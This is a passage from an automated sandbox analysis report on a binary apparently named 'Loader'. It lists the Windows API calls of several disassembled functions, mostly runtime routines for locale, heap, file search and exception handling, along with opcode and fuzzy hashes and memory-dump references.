                                                                                                  • Opcode Fuzzy Hash: 9f4c0a5dff7770f7f8bb73b9497b94104609ac7afec32d409e65ef4d33b49ae7
                                                                                                  • Instruction Fuzzy Hash: D2012833600314AF9F028F68EC8091737A6FBC27297284125F912DB694DB30EC108BF2
                                                                                                  APIs
                                                                                                  • RtlAllocateHeap.NTDLL(00000000,00D47675,?,?,00D47675,00000220,?,?,?), ref: 00D45723
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AllocateHeap
                                                                                                  • String ID:
                                                                                                  • API String ID: 1279760036-0
                                                                                                  • Opcode ID: 31533ee6653ccf471f2715d93472d401f1ac15cd89e7ef60dcd2057311e32c1c
                                                                                                  • Instruction ID: 5194993b308995841d128465ef86d712e7e6cb5a04c821a107d94c12249fd902
                                                                                                  • Opcode Fuzzy Hash: 31533ee6653ccf471f2715d93472d401f1ac15cd89e7ef60dcd2057311e32c1c
                                                                                                  • Instruction Fuzzy Hash: 85E06D36200B21D7DA216E65BC05B5B3A88DF41BF0F290230FC45D629AEB60CC0081F0
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __floor_pentium4
                                                                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                  • API String ID: 4168288129-2761157908
                                                                                                  • Opcode ID: 35d5aa6aff82b23d1d197eacd3e3d23f7f40d1ba52a5da0019af1825c3134793
                                                                                                  • Instruction ID: 840053cc069748c0081b89bac08db80015d9b04bad5310646aa6c4536f473985
                                                                                                  • Opcode Fuzzy Hash: 35d5aa6aff82b23d1d197eacd3e3d23f7f40d1ba52a5da0019af1825c3134793
                                                                                                  • Instruction Fuzzy Hash: B9D22975E086298FDF65CE28CD407EAB7B5EB44306F1841EADC4DA7240DB74AE898F50
                                                                                                  APIs
                                                                                                  • GetLocaleInfoW.KERNEL32(?,2000000B,00D4AB6D,00000002,00000000,?,?,?,00D4AB6D,?,00000000), ref: 00D4B250
                                                                                                  • GetLocaleInfoW.KERNEL32(?,20001004,00D4AB6D,00000002,00000000,?,?,?,00D4AB6D,?,00000000), ref: 00D4B279
                                                                                                  • GetACP.KERNEL32(?,?,00D4AB6D,?,00000000), ref: 00D4B28E
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InfoLocale
                                                                                                  • String ID: ACP$OCP
                                                                                                  • API String ID: 2299586839-711371036
                                                                                                  • Opcode ID: 73fbb39909b10f7572f3357f9be20b62d0dd7cb0130b50acfa3fd77098ad2c1f
                                                                                                  • Instruction ID: 12211e599adba2b564d31649dd473cea1bd023f344e81f659e69991d4562734d
                                                                                                  • Opcode Fuzzy Hash: 73fbb39909b10f7572f3357f9be20b62d0dd7cb0130b50acfa3fd77098ad2c1f
                                                                                                  • Instruction Fuzzy Hash: 3221B8227002009BDB348F65C981B9F77A6EF74B74B5E4526E949DB214E772DE40C374
                                                                                                  APIs
                                                                                                    • Part of subcall function 00D4594A: GetLastError.KERNEL32(00000000,?,00D47CCD), ref: 00D4594E
                                                                                                    • Part of subcall function 00D4594A: SetLastError.KERNEL32(00000000,?,?,00000028,00D41F93), ref: 00D459F0
                                                                                                  • GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 00D4AB3F
                                                                                                  • IsValidCodePage.KERNEL32(00000000), ref: 00D4AB7D
                                                                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 00D4AB90
                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00D4ABD8
                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00D4ABF3
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                  • String ID:
                                                                                                  • API String ID: 415426439-0
                                                                                                  • Opcode ID: 5aa65f54b1953f985d331977e8eb3d5ae17fff187eac576dc34efcdd343f705f
                                                                                                  • Instruction ID: e26e11fe08b71ad3647ddab8a869fb332a512916b52f0625e03c7b66b26e2897
                                                                                                  • Opcode Fuzzy Hash: 5aa65f54b1953f985d331977e8eb3d5ae17fff187eac576dc34efcdd343f705f
                                                                                                  • Instruction Fuzzy Hash: 68516F71A40209AFDB10DFA9CC85ABE77B9EF14701F084569E941EB191E770DA44CB72
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 5bda445c65ae4a74fe40377494680e1620293ac17931db5f8abb93f471be9a26
                                                                                                  • Instruction ID: 9e6a83295ab796a3278f1d02f71d01fb70d87e40b0c787915c00f6039d8409a4
                                                                                                  • Opcode Fuzzy Hash: 5bda445c65ae4a74fe40377494680e1620293ac17931db5f8abb93f471be9a26
                                                                                                  • Instruction Fuzzy Hash: D2020BB1E012199BDB14CFADD8806AEFBF1FF48314F298269E515E7341D731AA458BA0
                                                                                                  APIs
                                                                                                  • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D4B889
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FileFindFirst
                                                                                                  • String ID:
                                                                                                  • API String ID: 1974802433-0
                                                                                                  • Opcode ID: 6cd2b267ba7cf7dc01e2ce351754df764c0259c9b1faa59d3ee63fc8a5ad8b7d
                                                                                                  • Instruction ID: 370eed927a723f1e11bfb7de3bd3d689faa5e42f8a84b9de4f7d89e9b45a2192
                                                                                                  • Opcode Fuzzy Hash: 6cd2b267ba7cf7dc01e2ce351754df764c0259c9b1faa59d3ee63fc8a5ad8b7d
                                                                                                  • Instruction Fuzzy Hash: C071D5719052686FDF24AF348C89ABABBB8EF55310F1841DAE449A7211DB31CE849F70
                                                                                                  APIs
                                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00D39A7F
                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 00D39B4B
                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00D39B64
                                                                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 00D39B6E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                  • String ID:
                                                                                                  • API String ID: 254469556-0
                                                                                                  • Opcode ID: 40baa707e00af431826123cbb8908d0f484746716394040289c985218bfbd293
                                                                                                  • Instruction ID: 33e727686362e96c2399b76567f4c31698e8b41c058c68c9a0c3e1d6d1403421
                                                                                                  • Opcode Fuzzy Hash: 40baa707e00af431826123cbb8908d0f484746716394040289c985218bfbd293
                                                                                                  • Instruction Fuzzy Hash: 4631F775D053189BDB21EFA4D9497CDBBB8AF08300F1041EAE40CAB250EBB09B84CF55
                                                                                                  APIs
                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00D3A347
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00D3A356
                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 00D3A35F
                                                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 00D3A36C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 2933794660-0
                                                                                                  • Opcode ID: 472acaaa64d4f5092aa7355497ff0c7d3ffb73e19b09b722b99e176650c21b7e
                                                                                                  • Instruction ID: 8d89edd7c7494ecb4131dd961897051ae212997bc0e71d223859523e00d7eb9f
                                                                                                  • Opcode Fuzzy Hash: 472acaaa64d4f5092aa7355497ff0c7d3ffb73e19b09b722b99e176650c21b7e
                                                                                                  • Instruction Fuzzy Hash: FDF05F74D1030DEBCB04EBB4DA8999EBBF4FF1C205B9149A5A812E7210E630AB449F61
                                                                                                  APIs
                                                                                                    • Part of subcall function 00D4594A: GetLastError.KERNEL32(00000000,?,00D47CCD), ref: 00D4594E
                                                                                                    • Part of subcall function 00D4594A: SetLastError.KERNEL32(00000000,?,?,00000028,00D41F93), ref: 00D459F0
                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00D4AD84
                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00D4ADCE
                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00D4AE94
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InfoLocale$ErrorLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 661929714-0
                                                                                                  • Opcode ID: 26cd1b4c8c7c17cbb31f8cabd8586a6b312e1b28a95e9435ea0d71765f37a5d8
                                                                                                  • Instruction ID: 7c75437aed992f5ac394127a6778be1aed37a9993e010ba2dd02a5a6883db31f
                                                                                                  • Opcode Fuzzy Hash: 26cd1b4c8c7c17cbb31f8cabd8586a6b312e1b28a95e9435ea0d71765f37a5d8
                                                                                                  • Instruction Fuzzy Hash: 5261AFB16902079FDB289F28CD82BBAB7A8EF04310F18407AFD15C6285E774D985CB71
                                                                                                  APIs
                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00D41B58
                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00D41B62
                                                                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00D41B6F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                  • String ID:
                                                                                                  • API String ID: 3906539128-0
                                                                                                  • Opcode ID: cfe6a273611127a7f3c581ef00ef805d2941a0367d15b7096a4a23a8774b73b2
                                                                                                  • Instruction ID: a6cb5d650052283af251b4b3c4c8eb1cf83047a750e880f283c8b3f59fc95222
                                                                                                  • Opcode Fuzzy Hash: cfe6a273611127a7f3c581ef00ef805d2941a0367d15b7096a4a23a8774b73b2
                                                                                                  • Instruction Fuzzy Hash: 9E31B3B59013289BCB61DF68D8897CDBBB8FF08710F5042DAE81CA7251E7709B858F64
                                                                                                  APIs
                                                                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00D4E9E9,?,?,00000008,?,?,00D5539B,00000000), ref: 00D4ECBB
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionRaise
                                                                                                  • String ID:
                                                                                                  • API String ID: 3997070919-0
                                                                                                  • Opcode ID: 5f0014ebb5cbd7c76e6ce0d8dc12c6068a4f8a4eb18bce49dfd97206e8b4afca
                                                                                                  • Instruction ID: b7858acc9966fbf7e4d183e4eadd1efa74a83e7f87cd6fc2f4377595a677726c
                                                                                                  • Opcode Fuzzy Hash: 5f0014ebb5cbd7c76e6ce0d8dc12c6068a4f8a4eb18bce49dfd97206e8b4afca
                                                                                                  • Instruction Fuzzy Hash: 7CB14D31610609EFD719CF28C48AB657BE1FF45364F298658E8DACF2A1C335E991CB50
                                                                                                  APIs
                                                                                                  • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00D396F1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FeaturePresentProcessor
                                                                                                  • String ID:
                                                                                                  • API String ID: 2325560087-0
                                                                                                  • Opcode ID: 3bebe342846fcdf64453d551b27145fbf95d6021fd5f687140fff3bc5bea67ec
                                                                                                  • Instruction ID: ee5be79dc8be2833e2e9d4563672b1336075fc01e92ab2bd99e66340d287a486
                                                                                                  • Opcode Fuzzy Hash: 3bebe342846fcdf64453d551b27145fbf95d6021fd5f687140fff3bc5bea67ec
                                                                                                  • Instruction Fuzzy Hash: 83A13DB591170A8FDB18DF54D8916AEBBF0FB48314F18956AD415E73A0D3B49940CFB0
                                                                                                  APIs
                                                                                                    • Part of subcall function 00D469F4: HeapAlloc.KERNEL32(00000008,00000000,00000000,?,00D45B8F,00000001,00000364,00000002,000000FF,?,00000000,?,00D3D655,00000000,?), ref: 00D46A35
                                                                                                  • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D4B889
                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00D4B97D
                                                                                                  • FindClose.KERNEL32(00000000), ref: 00D4B9BC
                                                                                                  • FindClose.KERNEL32(00000000), ref: 00D4B9EF
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Find$CloseFile$AllocFirstHeapNext
                                                                                                  • String ID:
                                                                                                  • API String ID: 2701053895-0
                                                                                                  • Opcode ID: f387d84d7a9ec86aaea4f0a639a71f9dba147b87746009917f0447097ab57559
                                                                                                  • Instruction ID: ad8f6f05c7818d28e15467f68b9bf511e2951fa71338b1ac802c14385dc9c3c3
                                                                                                  • Opcode Fuzzy Hash: f387d84d7a9ec86aaea4f0a639a71f9dba147b87746009917f0447097ab57559
                                                                                                  • Instruction Fuzzy Hash: 8F513675900218AFDF24AF389C85ABE7BB9DFA5364F18419AF85997201EB30CD419F70
                                                                                                  APIs
                                                                                                    • Part of subcall function 00D4594A: GetLastError.KERNEL32(00000000,?,00D47CCD), ref: 00D4594E
                                                                                                    • Part of subcall function 00D4594A: SetLastError.KERNEL32(00000000,?,?,00000028,00D41F93), ref: 00D459F0
                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00D4B044
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$InfoLocale
                                                                                                  • String ID:
                                                                                                  • API String ID: 3736152602-0
                                                                                                  • Opcode ID: 2be5c73d20df5bf199dda6c9879ad718a39f80ff111444cc843a6393698c1428
                                                                                                  • Instruction ID: be16343ccb7e590cb0da67d047e0b813fb8f6ff3824faed5c9dc85ca225dfb66
                                                                                                  • Opcode Fuzzy Hash: 2be5c73d20df5bf199dda6c9879ad718a39f80ff111444cc843a6393698c1428
                                                                                                  • Instruction Fuzzy Hash: B0219272605206ABDF289B29DC41ABB77A8EF66321F14407BFD12D6181EB74ED418B70
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 0
                                                                                                  • API String ID: 0-4108050209
                                                                                                  • Opcode ID: 4b3882e634a5442974cb9b846ff82eefb9518c74b14400d0af67807947fd5364
                                                                                                  • Instruction ID: b9d1aa2e606c1a3a60631aaf88d4e91d43911770a5b69b2102790a56078a3607
                                                                                                  • Opcode Fuzzy Hash: 4b3882e634a5442974cb9b846ff82eefb9518c74b14400d0af67807947fd5364
                                                                                                  • Instruction Fuzzy Hash: 95B1B37090464A8FCB288F68E5956BEBBB2EF15300F180619E5D3AB6D1D771EA01CF71
                                                                                                  APIs
                                                                                                    • Part of subcall function 00D4594A: GetLastError.KERNEL32(00000000,?,00D47CCD), ref: 00D4594E
                                                                                                    • Part of subcall function 00D4594A: SetLastError.KERNEL32(00000000,?,?,00000028,00D41F93), ref: 00D459F0
                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00D4B164
                                                                                                  Memory Dump Source
